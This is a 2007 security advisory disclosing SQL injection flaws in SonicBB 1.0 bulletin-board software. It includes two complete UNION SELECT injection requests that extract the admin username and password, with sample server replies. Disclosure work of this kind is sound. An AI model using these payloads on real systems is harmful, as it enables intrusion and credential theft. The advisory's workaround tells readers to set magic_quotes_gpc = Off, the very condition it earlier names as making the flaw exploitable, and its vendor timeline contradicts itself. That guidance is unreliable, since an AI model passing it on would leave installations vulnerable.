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Posted on 15 May 2007

netVigilance Security Advisory #19 SonicBB version 1.0 Multiple SQL Injection Vulnerabilities Description: SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combo with PHP 4.x or higher installed.SonicBB is the ideal community software for all sites. This vulnerabilities can be exploited only when PHP magic_quotes_gpc = Off. External References: Mitre CVE: CVE-2007-1902 NVD NIST: CVE-2007-1902 OSVDB: 33907 Summary: SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is compatible with any web server/operating system combo with PHP 4.x or higher installed. SonicBB is the ideal community software for all sites. Security problems in the product allow attackers commit SQL injections Advisory URL: http://www.netvigilance.com/advisory0019 Release Date: 05/14/2007 Severity: Risk: High CVSS Metrics Access Vector: Remote Access Complexity: High Authentication: Not-required Confidentiality Impact: Complete Integrity Impact: Partial Availability Impact: Partial Impact Bias: Confidentiality CVSS Base Score: 6.8 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Confirmed Vulnerability Impact: Attack Host Impact: SQL Injection. SecureScout Testcase ID: TC 17945 Vulnerable Systems: SonicBB version 1.0 Vulnerability Type: SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges. Vendor: iScripts Vendor Status: Contact with the Vendor was established and draft of the security advisory was provided on 10 April 2007, the vendor promised to fix the issue but stopped responding to our emails on 10 April 2007. There is no official fix at the release of this Security Advisory Workaround: Modify in the php.ini file following line: magic_quotes_gpc = Off. Example: SQL Injection Vulnerability 1: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/ search.php?query=1&part=post`<> '' UNION SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/ REPLY: <table width="100%" cellspacing="1" cellpadding="5" class="forums"><tr><td width="40%" class="alt5">Post Title</td><td width="60%" class="alt5"> Author</td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1"> Test Thread</a></td> <td class="alt7"><b><a href="members.php?id=1">admin</a> </b></td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1"> [SQL INJECTION RESULT - ADMIN PASSWORD]</a></td><td class="alt7"><b><a href="members.php?id=1">[SQL INJECTION RESULT - ADMIN NAME]</a></b></td> ... SQL Injection Vulnerability 2: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23 REPLY: ... <a href="viewthread.php?id=1">[SQL INJECTION RESULT - ADMIN PASSWORD]</a><br />By <a href="members.php?id=1">... Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com

 

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